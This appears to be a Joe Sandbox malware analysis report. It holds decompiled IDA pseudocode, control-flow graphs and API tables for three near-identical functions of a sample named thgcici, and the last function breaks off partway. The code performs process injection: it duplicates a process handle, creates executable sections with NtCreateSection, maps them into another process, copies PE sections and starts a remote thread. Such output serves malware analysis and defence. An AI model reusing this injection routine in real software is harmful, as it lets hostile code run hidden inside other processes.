                                                • Source File: 0000000B.00000002.447095995.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_thgcici.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: 06c4aeac5c9008a8151b096b28b30952d6c6a279b8400e856803706fc5547dc2
                                                • Instruction ID: 47c243d31b0f26d8a37b4f88288270fe43ad698e9a2cc1103bbf91406d28765b
                                                • Opcode Fuzzy Hash: 06c4aeac5c9008a8151b096b28b30952d6c6a279b8400e856803706fc5547dc2
                                                • Instruction Fuzzy Hash: 92511AB4900245BBEB219F91CC48FEBBFB8FF85700F14012AF912BA2E5D6759945CB24
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 94 4015ea-4015ef 98 401603 94->98 99 4015f4-40162b call 401274 94->99 98->99 106 401630-401635 99->106 107 40162d 99->107 109 401956-40195e 106->109 110 40163b-40164c 106->110 107->106 109->106 115 401963-4019b3 call 401274 109->115 113 401652-40167b 110->113 114 401954 110->114 113->114 123 401681-401698 NtDuplicateObject 113->123 114->115 123->114 125 40169e-4016c2 NtCreateSection 123->125 126 4016c4-4016e5 NtMapViewOfSection 125->126 127 40171e-401744 NtCreateSection 125->127 126->127 129 4016e7-401703 NtMapViewOfSection 126->129 127->114 130 40174a-40174e 127->130 129->127 132 401705-40171b 129->132 130->114 133 401754-401775 NtMapViewOfSection 130->133 132->127 133->114 135 40177b-401797 NtMapViewOfSection 133->135 135->114 138 40179d call 4017a2 135->138
                                                C-Code - Quality: 58%
                                                			E004015EA(void* __esi, void* __eflags) {
                                                				intOrPtr _t88;
                                                				void* _t91;
                                                				intOrPtr _t92;
                                                				struct _GUID _t99;
                                                				struct _GUID _t101;
                                                				PVOID* _t103;
                                                				PVOID* _t105;
                                                				intOrPtr* _t109;
                                                				PVOID* _t122;
                                                				PVOID* _t124;
                                                				intOrPtr _t128;
                                                				void** _t132;
                                                				signed int _t139;
                                                				int _t140;
                                                				void* _t157;
                                                				signed int _t161;
                                                				signed int _t162;
                                                				signed int _t163;
                                                				signed int _t164;
                                                				signed int _t165;
                                                				void* _t166;
                                                				intOrPtr* _t167;
                                                				void* _t170;
                                                				intOrPtr _t180;
                                                				void* _t181;
                                                				void* _t182;
                                                				HANDLE* _t188;
                                                				HANDLE* _t190;
                                                				void* _t195;
                                                				intOrPtr* _t198;
                                                				void* _t201;
                                                				void* _t202;
                                                				void* _t204;
                                                				intOrPtr* _t205;
                                                				void* _t209;
                                                				long _t224;
                                                
                                                				asm("aad 0x6b");
                                                				_push(0x392);
                                                				_t205 = _t204 + 4;
                                                				L00401274(0x161d, 0xf1, __esi, __eflags);
                                                				_t128 =  *((intOrPtr*)(_t202 + 8));
                                                				 *((intOrPtr*)(_t202 - 0x34)) = 0;
                                                				if(gs != 0) {
                                                					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
                                                				}
                                                				while(1) {
                                                					_t88 =  *((intOrPtr*)(_t128 + 0x48))();
                                                					if(_t88 != 0) {
                                                						break;
                                                					}
                                                					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                                                				}
                                                				 *((intOrPtr*)(_t202 - 0x5c)) = _t88;
                                                				_t188 = _t202 - 0x60;
                                                				 *_t188 = 0;
                                                				 *((intOrPtr*)(_t128 + 0x4c))(_t88, _t188);
                                                				_t91 =  *_t188;
                                                				if(_t91 != 0) {
                                                					_t132 = _t202 - 0x30;
                                                					 *_t132 = _t91;
                                                					_t132[1] = 0;
                                                					_t188 = _t202 - 0x28;
                                                					 *((intOrPtr*)(_t128 + 0x10))(_t188, 0x18);
                                                					 *_t188 = 0x18;
                                                					_push(_t202 - 0x30);
                                                					_push(_t188);
                                                					_push(0x40);
                                                					_push(_t202 - 0x10);
                                                					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, 0, 0, 2) == 0) {
                                                						 *((intOrPtr*)(_t202 - 8)) = 0;
                                                						_t99 = _t202 - 0x50;
                                                						 *((intOrPtr*)(_t99 + 4)) = 0;
                                                						 *_t99 = 0x5000;
                                                						_t190 = _t202 - 0x54;
                                                						if(NtCreateSection(_t190, 6, 0, _t99, 4, 0x8000000, 0) == 0) {
                                                							 *_t25 =  *(_t202 - 0x50);
                                                							_t122 = _t202 - 0x44;
                                                							 *_t122 = 0;
                                                							if(NtMapViewOfSection( *_t190, 0xffffffff, _t122, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                                                								_t124 = _t202 - 0x3c;
                                                								 *_t124 = 0;
                                                								if(NtMapViewOfSection( *_t190,  *(_t202 - 0xc), _t124, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                                                									_t201 =  *(_t202 - 0x44);
                                                									 *((intOrPtr*)(_t128 + 0x20))(0, _t201, 0x104);
                                                									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
                                                									 *((intOrPtr*)(_t202 - 8)) =  *((intOrPtr*)(_t202 - 8)) + 1;
                                                								}
                                                							}
                                                						}
                                                						_t101 = _t202 - 0x50;
                                                						 *((intOrPtr*)(_t101 + 4)) = 0;
                                                						 *_t101 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
                                                						_t188 = _t202 - 0x58;
                                                						if(NtCreateSection(_t188, 0xe, 0, _t101, 0x40, 0x8000000, 0) == 0 &&  *((intOrPtr*)(_t202 - 8)) != 0) {
                                                							 *_t46 =  *(_t202 - 0x50);
                                                							_t103 = _t202 - 0x48;
                                                							 *_t103 = 0;
                                                							if(NtMapViewOfSection( *_t188, 0xffffffff, _t103, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                                                								_t105 = _t202 - 0x40;
                                                								 *_t105 = 0;
                                                								_t224 = NtMapViewOfSection( *_t188,  *(_t202 - 0xc), _t105, 0, 0, 0, _t202 - 0x38, 1, 0, 0x20);
                                                								if(_t224 == 0) {
                                                									L24();
                                                									if(_t224 == 0 && _t224 != 0) {
                                                										asm("hlt");
                                                										_push(_t205);
                                                									}
                                                									_push(0x2ea6);
                                                									_t209 = _t205 + 4;
                                                									_t161 = 0x2260;
                                                									_t162 = _t161 << 5;
                                                									_t163 = _t162 + 0x2260;
                                                									asm("lodsb");
                                                									_t164 = _t163;
                                                									asm("loop 0xffffffc4");
                                                									_t165 = _t164 ^ 0xad610a21;
                                                									_t205 = _t209 - _t165;
                                                									_t195 =  *((intOrPtr*)(_t202 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0xc))));
                                                									_t139 =  *(_t195 + 6) & 0x0000ffff;
                                                									_push(_t195);
                                                									_t166 = _t195;
                                                									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
                                                										_t167 = _t166 + 0xf8;
                                                										__eflags = _t167;
                                                									} else {
                                                										_t167 = _t166 + 0x108;
                                                									}
                                                									_push(_t139);
                                                									_t140 =  *(_t167 + 0x10);
                                                									if(_t140 != 0) {
                                                										memcpy( *((intOrPtr*)(_t167 + 0xc)) +  *(_t202 - 0x48),  *((intOrPtr*)(_t167 + 0x14)) +  *((intOrPtr*)(_t202 + 0xc)), _t140);
                                                										_t205 = _t205 + 0xc;
                                                									}
                                                									asm("loop 0xffffffe6");
                                                									_pop(_t188);
                                                									_t228 =  *((intOrPtr*)(_t202 - 0x34));
                                                									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
                                                										_push(_t188);
                                                										_t170 = _t188[0xd] -  *(_t202 - 0x40);
                                                										_t198 = _t188[0x28] +  *(_t202 - 0x48);
                                                										__eflags = _t198;
                                                										while(1) {
                                                											__eflags =  *_t198;
                                                											if( *_t198 == 0) {
                                                												break;
                                                											}
                                                											_t180 =  *_t198;
                                                											_t198 = _t198 + 8;
                                                											asm("lodsw");
                                                											__eflags = 0;
                                                											if(0 != 0) {
                                                												 *0x00000000 =  *0x00000000 - _t170;
                                                												__eflags =  *((intOrPtr*)( *(_t202 - 0x48) + 0 + _t180));
                                                											}
                                                											asm("loop 0xffffffe9");
                                                										}
                                                										_pop(_t188);
                                                										__eflags = 0;
                                                										_t109 = _t202 - 4;
                                                										 *_t109 = 0;
                                                										 *((intOrPtr*)(_t128 + 0x98))( *(_t202 - 0xc), 0, 0, 0, 0, 0, _t188[0xa] +  *(_t202 - 0x40),  *(_t202 - 0x3c), _t109, 0);
                                                									} else {
                                                										L57();
                                                										_pop(_t181);
                                                										_t182 = _t181 - 0x1892;
                                                										 *((intOrPtr*)(_t182 + 0x18c6)) = _t182 + 0x304c;
                                                										L004012E3(_t128, _t228);
                                                										0x33(_t182 + 0x304c, 0x1ad);
                                                										 *((intOrPtr*)(_t182 + 0x18eb)) = _t182 + 0x309c;
                                                										0x33();
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				_push(0x161d);
                                                				_t92 =  *_t205;
                                                				_push(0x392);
                                                				_t157 = 0xf1;
                                                				return L00401274(_t92, _t157, _t188, _t228);
                                                			}







































                                                0x004015ea
                                                0x004015f4
                                                0x004015fc
                                                0x00401618
                                                0x0040161d
                                                0x00401622
                                                0x0040162b
                                                0x0040162d
                                                0x0040162d
                                                0x00401630
                                                0x00401630
                                                0x00401635
                                                0x00000000
                                                0x00000000
                                                0x0040195b
                                                0x0040195b
                                                0x0040163b
                                                0x0040163e
                                                0x00401641
                                                0x00401645
                                                0x00401648
                                                0x0040164c
                                                0x00401652
                                                0x00401655
                                                0x00401657
                                                0x0040165a
                                                0x00401660
                                                0x00401663
                                                0x00401671
                                                0x00401672
                                                0x00401673
                                                0x00401675
                                                0x0040167b
                                                0x0040169e
                                                0x004016a1
                                                0x004016a4
                                                0x004016a7
                                                0x004016ad
                                                0x004016c2
                                                0x004016c7
                                                0x004016ca
                                                0x004016cd
                                                0x004016e5
                                                0x004016e7
                                                0x004016ea
                                                0x00401703
                                                0x00401705
                                                0x0040170f
                                                0x00401715
                                                0x0040171b
                                                0x0040171b
                                                0x00401703
                                                0x004016e5
                                                0x0040171e
                                                0x0040172a
                                                0x0040172d
                                                0x0040172f
                                                0x00401744
                                                0x00401757
                                                0x0040175a
                                                0x0040175d
                                                0x00401775
                                                0x0040177b
                                                0x0040177e
                                                0x00401795
                                                0x00401797
                                                0x0040179d
                                                0x004017a2
                                                0x004017a6
                                                0x004017a7
                                                0x004017a7
                                                0x004017ce
                                                0x004017d6
                                                0x004017fd
                                                0x00401809
                                                0x00401813
                                                0x00401822
                                                0x0040182a
                                                0x0040182f
                                                0x00401838
                                                0x00401841
                                                0x0040184d
                                                0x0040184f
                                                0x00401853
                                                0x00401854
                                                0x0040185a
                                                0x00401864
                                                0x00401864
                                                0x0040185c
                                                0x0040185c
                                                0x0040185c
                                                0x0040186a
                                                0x0040186b
                                                0x00401870
                                                0x0040187e
                                                0x0040187e
                                                0x0040187e
                                                0x00401884
                                                0x00401886
                                                0x00401887
                                                0x0040188b
                                                0x004018f3
                                                0x004018f7
                                                0x00401902
                                                0x00401902
                                                0x00401905
                                                0x00401905
                                                0x00401908
                                                0x00000000
                                                0x00000000
                                                0x0040190a
                                                0x00401914
                                                0x00401919
                                                0x0040191b
                                                0x00401920
                                                0x0040192c
                                                0x0040192c
                                                0x0040192c
                                                0x0040192e
                                                0x0040192e
                                                0x00401932
                                                0x00401939
                                                0x0040193b
                                                0x0040193e
                                                0x0040194e
                                                0x0040188d
                                                0x0040188d
                                                0x00401892
                                                0x00401893
                                                0x004018a9
                                                0x004018b8
                                                0x004018c5
                                                0x004018dc
                                                0x004018ea
                                                0x004018ea
                                                0x0040188b
                                                0x00401797
                                                0x00401775
                                                0x00401744
                                                0x0040167b
                                                0x0040196b
                                                0x00401970
                                                0x00401984
                                                0x004019a2
                                                0x004019b3

                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.447095995.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_thgcici.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: dd4e0de63926995d70c8012033ee98f8c579de9534f11a3daa29428e27a07aaf
                                                • Instruction ID: 897f24c5fa4790511d5421a469eabb5bc73caab52430bd7d1b353843a9d98d60
                                                • Opcode Fuzzy Hash: dd4e0de63926995d70c8012033ee98f8c579de9534f11a3daa29428e27a07aaf
                                                • Instruction Fuzzy Hash: CB510BB4900245BBEF209F91CC48FEB7BB8FF85700F14016AF912BA2E5D6759945CB24
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 141 4015e0-4015ef 143 401603 141->143 144 4015f4-40162b call 401274 141->144 143->144 151 401630-401635 144->151 152 40162d 144->152 154 401956-40195e 151->154 155 40163b-40164c 151->155 152->151 154->151 160 401963-4019b3 call 401274 154->160 158 401652-40167b 155->158 159 401954 155->159 158->159 168 401681-401698 NtDuplicateObject 158->168 159->160 168->159 170 40169e-4016c2 NtCreateSection 168->170 171 4016c4-4016e5 NtMapViewOfSection 170->171 172 40171e-401744 NtCreateSection 170->172 171->172 174 4016e7-401703 NtMapViewOfSection 171->174 172->159 175 40174a-40174e 172->175 174->172 177 401705-40171b 174->177 175->159 178 401754-401775 NtMapViewOfSection 175->178 177->172 178->159 180 40177b-401797 NtMapViewOfSection 178->180 180->159 183 40179d call 4017a2 180->183
                                                C-Code - Quality: 58%
                                                			E004015E0(void* __esi, void* __eflags) {
                                                				intOrPtr _t88;
                                                				void* _t91;
                                                				intOrPtr _t92;
                                                				struct _GUID _t99;
                                                				struct _GUID _t101;
                                                				PVOID* _t103;
                                                				PVOID* _t105;
                                                				intOrPtr* _t109;
                                                				PVOID* _t122;
                                                				PVOID* _t124;
                                                				intOrPtr _t128;
                                                				void** _t133;
                                                				signed int _t140;
                                                				int _t141;
                                                				void* _t158;
                                                				signed int _t162;
                                                				signed int _t163;
                                                				signed int _t164;
                                                				signed int _t165;
                                                				signed int _t166;
                                                				void* _t167;
                                                				intOrPtr* _t168;
                                                				void* _t171;
                                                				intOrPtr _t181;
                                                				void* _t182;
                                                				void* _t183;
                                                				HANDLE* _t189;
                                                				HANDLE* _t191;
                                                				void* _t196;
                                                				intOrPtr* _t199;
                                                				void* _t202;
                                                				void* _t203;
                                                				void* _t205;
                                                				intOrPtr* _t206;
                                                				void* _t210;
                                                				long _t225;
                                                
                                                				asm("bound edi, [eax+0x161d]");
                                                				_push(0x392);
                                                				_t206 = _t205 + 4;
                                                				L00401274(0x161d, 0xf1, __esi, __eflags);
                                                				_t128 =  *((intOrPtr*)(_t203 + 8));
                                                				 *((intOrPtr*)(_t203 - 0x34)) = 0;
                                                				if(gs != 0) {
                                                					 *((intOrPtr*)(_t203 - 0x34)) =  *((intOrPtr*)(_t203 - 0x34)) + 1;
                                                				}
                                                				while(1) {
                                                					_t88 =  *((intOrPtr*)(_t128 + 0x48))();
                                                					if(_t88 != 0) {
                                                						break;
                                                					}
                                                					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                                                				}
                                                				 *((intOrPtr*)(_t203 - 0x5c)) = _t88;
                                                				_t189 = _t203 - 0x60;
                                                				 *_t189 = 0;
                                                				 *((intOrPtr*)(_t128 + 0x4c))(_t88, _t189);
                                                				_t91 =  *_t189;
                                                				if(_t91 != 0) {
                                                					_t133 = _t203 - 0x30;
                                                					 *_t133 = _t91;
                                                					_t133[1] = 0;
                                                					_t189 = _t203 - 0x28;
                                                					 *((intOrPtr*)(_t128 + 0x10))(_t189, 0x18);
                                                					 *_t189 = 0x18;
                                                					_push(_t203 - 0x30);
                                                					_push(_t189);
                                                					_push(0x40);
                                                					_push(_t203 - 0x10);
                                                					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t203 - 0x10), 0xffffffff, 0xffffffff, _t203 - 0xc, 0, 0, 2) == 0) {
                                                						 *((intOrPtr*)(_t203 - 8)) = 0;
                                                						_t99 = _t203 - 0x50;
                                                						 *((intOrPtr*)(_t99 + 4)) = 0;
                                                						 *_t99 = 0x5000;
                                                						_t191 = _t203 - 0x54;
                                                						if(NtCreateSection(_t191, 6, 0, _t99, 4, 0x8000000, 0) == 0) {
                                                							 *_t25 =  *(_t203 - 0x50);
                                                							_t122 = _t203 - 0x44;
                                                							 *_t122 = 0;
                                                							if(NtMapViewOfSection( *_t191, 0xffffffff, _t122, 0, 0, 0, _t203 - 0x38, 1, 0, 4) == 0) {
                                                								_t124 = _t203 - 0x3c;
                                                								 *_t124 = 0;
                                                								if(NtMapViewOfSection( *_t191,  *(_t203 - 0xc), _t124, 0, 0, 0, _t203 - 0x38, 1, 0, 4) == 0) {
                                                									_t202 =  *(_t203 - 0x44);
                                                									 *((intOrPtr*)(_t128 + 0x20))(0, _t202, 0x104);
                                                									 *((intOrPtr*)(_t202 + 0x208)) =  *((intOrPtr*)(_t203 + 0x14));
                                                									 *((intOrPtr*)(_t203 - 8)) =  *((intOrPtr*)(_t203 - 8)) + 1;
                                                								}
                                                							}
                                                						}
                                                						_t101 = _t203 - 0x50;
                                                						 *((intOrPtr*)(_t101 + 4)) = 0;
                                                						 *_t101 =  *((intOrPtr*)(_t203 + 0x10)) + 0x10000;
                                                						_t189 = _t203 - 0x58;
                                                						if(NtCreateSection(_t189, 0xe, 0, _t101, 0x40, 0x8000000, 0) == 0 &&  *((intOrPtr*)(_t203 - 8)) != 0) {
                                                							 *_t46 =  *(_t203 - 0x50);
                                                							_t103 = _t203 - 0x48;
                                                							 *_t103 = 0;
                                                							if(NtMapViewOfSection( *_t189, 0xffffffff, _t103, 0, 0, 0, _t203 - 0x38, 1, 0, 4) == 0) {
                                                								_t105 = _t203 - 0x40;
                                                								 *_t105 = 0;
                                                								_t225 = NtMapViewOfSection( *_t189,  *(_t203 - 0xc), _t105, 0, 0, 0, _t203 - 0x38, 1, 0, 0x20);
                                                								if(_t225 == 0) {
                                                									L23();
                                                									if(_t225 == 0 && _t225 != 0) {
                                                										asm("hlt");
                                                										_push(_t206);
                                                									}
                                                									_push(0x2ea6);
                                                									_t210 = _t206 + 4;
                                                									_t162 = 0x2260;
                                                									_t163 = _t162 << 5;
                                                									_t164 = _t163 + 0x2260;
                                                									asm("lodsb");
                                                									_t165 = _t164;
                                                									asm("loop 0xffffffc4");
                                                									_t166 = _t165 ^ 0xad610a21;
                                                									_t206 = _t210 - _t166;
                                                									_t196 =  *((intOrPtr*)(_t203 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t203 + 0xc))));
                                                									_t140 =  *(_t196 + 6) & 0x0000ffff;
                                                									_push(_t196);
                                                									_t167 = _t196;
                                                									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
                                                										_t168 = _t167 + 0xf8;
                                                										__eflags = _t168;
                                                									} else {
                                                										_t168 = _t167 + 0x108;
                                                									}
                                                									_push(_t140);
                                                									_t141 =  *(_t168 + 0x10);
                                                									if(_t141 != 0) {
                                                										memcpy( *((intOrPtr*)(_t168 + 0xc)) +  *(_t203 - 0x48),  *((intOrPtr*)(_t168 + 0x14)) +  *((intOrPtr*)(_t203 + 0xc)), _t141);
                                                										_t206 = _t206 + 0xc;
                                                									}
                                                									asm("loop 0xffffffe6");
                                                									_pop(_t189);
                                                									_t229 =  *((intOrPtr*)(_t203 - 0x34));
                                                									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
                                                										_push(_t189);
                                                										_t171 = _t189[0xd] -  *(_t203 - 0x40);
                                                										_t199 = _t189[0x28] +  *(_t203 - 0x48);
                                                										__eflags = _t199;
                                                										while(1) {
                                                											__eflags =  *_t199;
                                                											if( *_t199 == 0) {
                                                												break;
                                                											}
                                                											_t181 =  *_t199;
                                                											_t199 = _t199 + 8;
                                                											asm("lodsw");
                                                											__eflags = 0;
                                                											if(0 != 0) {
                                                												 *0x00000000 =  *0x00000000 - _t171;
                                                												__eflags =  *((intOrPtr*)( *(_t203 - 0x48) + 0 + _t181));
                                                											}
                                                											asm("loop 0xffffffe9");
                                                										}
                                                										_pop(_t189);
                                                										__eflags = 0;
                                                										_t109 = _t203 - 4;
                                                										 *_t109 = 0;
                                                										 *((intOrPtr*)(_t128 + 0x98))( *(_t203 - 0xc), 0, 0, 0, 0, 0, _t189[0xa] +  *(_t203 - 0x40),  *(_t203 - 0x3c), _t109, 0);
                                                									} else {
                                                										L56();
                                                										_pop(_t182);
                                                										_t183 = _t182 - 0x1892;
                                                										 *((intOrPtr*)(_t183 + 0x18c6)) = _t183 + 0x304c;
                                                										L004012E3(_t128, _t229);
                                                										0x33(_t183 + 0x304c, 0x1ad);
                                                										 *((intOrPtr*)(_t183 + 0x18eb)) = _t183 + 0x309c;
                                                										0x33();
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				_push(0x161d);
                                                				_t92 =  *_t206;
                                                				_push(0x392);
                                                				_t158 = 0xf1;
                                                				return L00401274(_t92, _t158, _t189, _t229);
                                                			}







































                                                0x004015e2
                                                0x004015f4
                                                0x004015fc
                                                0x00401618
                                                0x0040161d
                                                0x00401622
                                                0x0040162b
                                                0x0040162d
                                                0x0040162d
                                                0x00401630
                                                0x00401630
                                                0x00401635
                                                0x00000000
                                                0x00000000
                                                0x0040195b
                                                0x0040195b
                                                0x0040163b
                                                0x0040163e
                                                0x00401641
                                                0x00401645
                                                0x00401648
                                                0x0040164c
                                                0x00401652
                                                0x00401655
                                                0x00401657
                                                0x0040165a
                                                0x00401660
                                                0x00401663
                                                0x00401671
                                                0x00401672
                                                0x00401673
                                                0x00401675
                                                0x0040167b
                                                0x0040169e
                                                0x004016a1
                                                0x004016a4
                                                0x004016a7
                                                0x004016ad
                                                0x004016c2
                                                0x004016c7
                                                0x004016ca
                                                0x004016cd
                                                0x004016e5
                                                0x004016e7
                                                0x004016ea
                                                0x00401703
                                                0x00401705
                                                0x0040170f
                                                0x00401715
                                                0x0040171b
                                                0x0040171b
                                                0x00401703
                                                0x004016e5
                                                0x0040171e
                                                0x0040172a
                                                0x0040172d
                                                0x0040172f
                                                0x00401744
                                                0x00401757
                                                0x0040175a
                                                0x0040175d
                                                0x00401775
                                                0x0040177b
                                                0x0040177e
                                                0x00401795
                                                0x00401797
                                                0x0040179d
                                                0x004017a2
                                                0x004017a6
                                                0x004017a7
                                                0x004017a7
                                                0x004017ce
                                                0x004017d6
                                                0x004017fd
                                                0x00401809
                                                0x00401813
                                                0x00401822
                                                0x0040182a
                                                0x0040182f
                                                0x00401838
                                                0x00401841
                                                0x0040184d
                                                0x0040184f
                                                0x00401853
                                                0x00401854
                                                0x0040185a
                                                0x00401864
                                                0x00401864
                                                0x0040185c
                                                0x0040185c
                                                0x0040185c
                                                0x0040186a
                                                0x0040186b
                                                0x00401870
                                                0x0040187e
                                                0x0040187e
                                                0x0040187e
                                                0x00401884
                                                0x00401886
                                                0x00401887
                                                0x0040188b
                                                0x004018f3
                                                0x004018f7
                                                0x00401902
                                                0x00401902
                                                0x00401905
                                                0x00401905
                                                0x00401908
                                                0x00000000
                                                0x00000000
                                                0x0040190a
                                                0x00401914
                                                0x00401919
                                                0x0040191b
                                                0x00401920
                                                0x0040192c
                                                0x0040192c
                                                0x0040192c
                                                0x0040192e
                                                0x0040192e
                                                0x00401932
                                                0x00401939
                                                0x0040193b
                                                0x0040193e
                                                0x0040194e
                                                0x0040188d
                                                0x0040188d
                                                0x00401892
                                                0x00401893
                                                0x004018a9
                                                0x004018b8
                                                0x004018c5
                                                0x004018dc
                                                0x004018ea
                                                0x004018ea
                                                0x0040188b
                                                0x00401797
                                                0x00401775
                                                0x00401744
                                                0x0040167b
                                                0x0040196b
                                                0x00401970
                                                0x00401984
                                                0x004019a2
                                                0x004019b3

                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.447095995.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_thgcici.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: 59eebf06962e76d0b9a77aedd2cacf8695bc8255fa518079300205c73098de0f
                                                • Instruction ID: 8306347d173e952d8899d3997cb349dcf7f01c905c4505a4b1f9f6e7b55dad69
                                                • Opcode Fuzzy Hash: 59eebf06962e76d0b9a77aedd2cacf8695bc8255fa518079300205c73098de0f
                                                • Instruction Fuzzy Hash: 7E5119B0900245BFEB209F91CC48FEBBBB8EF85700F14416AF911BB2A5D6759945CB24
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 186 4015ee-4015ef 188 401603 186->188 189 4015f4-40162b call 401274 186->189 188->189 196 401630-401635 189->196 197 40162d 189->197 199 401956-40195e 196->199 200 40163b-40164c 196->200 197->196 199->196 205 401963-4019b3 call 401274 199->205 203 401652-40167b 200->203 204 401954 200->204 203->204 213 401681-401698 NtDuplicateObject 203->213 204->205 213->204 215 40169e-4016c2 NtCreateSection 213->215 216 4016c4-4016e5 NtMapViewOfSection 215->216 217 40171e-401744 NtCreateSection 215->217 216->217 219 4016e7-401703 NtMapViewOfSection 216->219 217->204 220 40174a-40174e 217->220 219->217 222 401705-40171b 219->222 220->204 223 401754-401775 NtMapViewOfSection 220->223 222->217 223->204 225 40177b-401797 NtMapViewOfSection 223->225 225->204 228 40179d call 4017a2 225->228
                                                C-Code - Quality: 58%
                                                			E004015EE(void* __esi, void* __eflags) {
                                                				void* _t85;
                                                				intOrPtr _t88;
                                                				void* _t91;
                                                				intOrPtr _t92;
                                                				struct _GUID _t99;
                                                				struct _GUID _t101;
                                                				PVOID* _t103;
                                                				PVOID* _t105;
                                                				intOrPtr* _t109;
                                                				PVOID* _t122;
                                                				PVOID* _t124;
                                                				intOrPtr _t128;
                                                				void** _t132;
                                                				signed int _t139;
                                                				int _t140;
                                                				void* _t157;
                                                				signed int _t161;
                                                				signed int _t162;
                                                				signed int _t163;
                                                				signed int _t164;
                                                				signed int _t165;
                                                				void* _t166;
                                                				intOrPtr* _t167;
                                                				void* _t170;
                                                				intOrPtr _t180;
                                                				void* _t181;
                                                				void* _t182;
                                                				HANDLE* _t188;
                                                				HANDLE* _t190;
                                                				void* _t195;
                                                				intOrPtr* _t198;
                                                				void* _t201;
                                                				void* _t202;
                                                				void* _t204;
                                                				intOrPtr* _t205;
                                                				void* _t209;
                                                				long _t224;
                                                
                                                				asm("lodsd");
                                                				_push(0x392);
                                                				_t205 = _t204 + 4;
                                                				L00401274(_t85, 0xf1, __esi, __eflags);
                                                				_t128 =  *((intOrPtr*)(_t202 + 8));
                                                				 *((intOrPtr*)(_t202 - 0x34)) = 0;
                                                				if(gs != 0) {
                                                					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
                                                				}
                                                				while(1) {
                                                					_t88 =  *((intOrPtr*)(_t128 + 0x48))();
                                                					if(_t88 != 0) {
                                                						break;
                                                					}
                                                					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                                                				}
                                                				 *((intOrPtr*)(_t202 - 0x5c)) = _t88;
                                                				_t188 = _t202 - 0x60;
                                                				 *_t188 = 0;
                                                				 *((intOrPtr*)(_t128 + 0x4c))(_t88, _t188);
                                                				_t91 =  *_t188;
                                                				if(_t91 != 0) {
                                                					_t132 = _t202 - 0x30;
                                                					 *_t132 = _t91;
                                                					_t132[1] = 0;
                                                					_t188 = _t202 - 0x28;
                                                					 *((intOrPtr*)(_t128 + 0x10))(_t188, 0x18);
